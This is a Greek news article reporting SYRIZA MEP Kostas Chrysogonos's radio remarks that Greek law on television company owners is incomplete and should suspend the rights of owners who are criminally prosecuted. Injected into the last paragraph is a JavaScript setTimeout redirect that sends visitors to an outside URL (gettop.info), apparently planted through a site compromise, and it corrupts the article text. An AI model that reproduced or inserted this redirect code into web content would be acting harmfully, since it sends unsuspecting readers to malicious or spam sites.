Χρυσόγονος: Ατελές το θεσμικό πλαίσιο για τα κανάλια

0
6

 

Τη θέση ότι το υφιστάμενο θεσμικό πλαίσιο για τις τηλεοπτικές επιχειρήσεις είναι ατελές και χρειάζεται συμπλήρωση διατύπωσε ο ευρωβουλευτής του ΣΥΡΙΖΑ, Κώστας Χρυσόγονος, μιλώντας στον ραδιοφωνικό σταθμό του Αθηναϊκού-Μακεδονικού Πρακτορείου Ειδήσεων, «Πρακτορείο 104,9 FM».

Όπως διευκρίνισε, η συμπλήρωση του θεσμικού πλαισίου είναι απαραίτητη τουλάχιστον σε ό,τι αφορά τα κωλύματα για την συμμετοχή στη διοίκηση τηλεοπτικών επιχειρήσεων, για την άσκηση των δικαιωμάτων μετόχου σε τηλεοπτικές επιχειρήσεις και για την ίδια την κατοχή μετοχών σε τηλεοπτικές επιχειρήσεις.

«Δεν νοείται ο καναλάρχης να έχει λιγότερα κωλύματα από τον δημόσιο υπάλληλο» είπε και πρόσθεσε: «Εφόσον έχει ασκηθεί ποινική δίωξη ή εφόσον έχει παραπεμφθεί κάποιος με αμετάκλητο βούλευμα, πάντως σε κάποια φάση ποινικής προδικασίας πρέπει να αναστέλλεται η συμμετοχή καναλάρχη στη διοίκηση τηλεοπτικής επιχείρησης και να αναστέλλονται τα δικαιώματά του από τα δικαιώματα του μετόχου ή μεγαλομετόχου. Και αν τελικά καταδικαστεί, τότε πρέπει να εκπίπτει για συγκεκριμένα αδικήματα βεβαίως, όχι για τροχαία παράβαση».

Απαντώντας σε ερώτηση με αφορμή τη δεύτερη διάσκεψη της Ολομέλειας του Συμβουλίου της Επικρατείας, για το θέμα ο κ. Χρυσόγονος ανέφερε: «Δεν θέλω να σχολιάσω την ευρισκόμενη σε εξέλιξη διαδικασία στο Συμβούλιο της Επικρατείας. Πρέπει να αφήσουμε τους δικαστές να επιτελέσουν το καθήκον τους ανεπηρέαστοι από κραυγές και ψιθύρους. Να κρατήσουμε όλοι χαμηλούς τόνους, να σεβαστούμε την εν εξελίξει διάσκεψη του δικαστηρίου. Το όποιο αποτέλεσμά της πρέπει να γίνει σεβαστό». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here